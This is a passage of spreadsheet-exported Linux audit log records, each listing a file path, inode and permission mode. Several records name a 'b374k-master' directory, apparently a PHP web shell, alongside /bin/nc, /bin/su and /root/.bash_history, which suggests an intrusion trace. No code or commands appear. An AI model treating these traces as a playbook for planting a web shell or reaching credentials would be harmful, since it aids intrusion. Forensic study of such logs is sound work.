    <t>item=0 name=(null) inode=2101667 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101668 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101670 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101671 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101672 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101673 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101674 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101675 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="b374k-master/theme/" inode=2101676 dev=08:01 mode=040755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101677 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101678 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101679 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101680 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101681 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101682 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/bin/su" inode=2228381 dev=08:01 mode=0104755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/bin/bash" inode=2228231 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/groups" inode=1442219 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/root/.bash_history" inode=525179 dev=08:01 mode=0100600 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/lesspipe" inode=2228300 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/basename" inode=1441887 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/dircolors" inode=1442023 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/bin/mv" inode=2228320 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/bin/hostname" inode=2228288 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/python" inode=1448856 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/lib/command-not-found" inode=1443593 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/snap" inode=1443028 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/bin/nc" inode=2228323 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/lib/php/sessionclean" inode=1455571 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/sbin/phpquery" inode=1455573 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/php7.2" inode=1455627 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/bin/pidof" inode=917593 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/home" inode=2621441 dev=08:01 mode=040755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="." inode=2621441 dev=08:01 mode=040755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/bin/ls" inode=2228308 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=".dbus" inode=2631491 dev=08:01 mode=040700 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=".." inode=2621441 dev=08:01 mode=040755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/dpkg-split" inode=1442038 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/dpkg-deb" inode=1442033 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/bin/tar" inode=2228395 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2254075 dev=08:01 mode=0100600 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2254080 dev=08:01 mode=0100600 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2254084 dev=08:01 mode=0100700 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2254089 dev=08:01 mode=0100700 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="." inode=2250754 dev=08:01 mode=040755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/var/lib/dpkg/info/python-pip.prerm" inode=2256557 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/pyclean" inode=1448875 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=1 name="/usr/bin/python2" inode=1448856 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/dpkg-query" inode=1442036 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1457597 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1457598 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713455 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713456 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713457 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713458 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713459 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713460 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713461 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713462 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713463 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713464 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713465 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713466 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713467 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713468 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713469 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713470 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713471 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713472 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713473 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713474 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713475 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713476 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713477 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713478 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713479 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713480 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713481 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713482 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713483 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713484 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713485 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713486 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713487 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713488 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713489 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713490 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713491 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713492 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713493 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713494 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713495 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713496 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713497 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713498 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713499 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713500 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713501 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713502 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713503 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713504 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713505 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713506 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713507 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713508 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713509 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713510 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713568 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713569 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713570 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713571 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713572 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713573 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713574 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713575 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713576 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713577 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713578 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713579 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713580 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713581 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713582 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713583 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713584 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713585 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713586 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713587 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713588 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713589 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713590 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713591 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713592 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713593 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713594 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713595 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713596 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713597 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
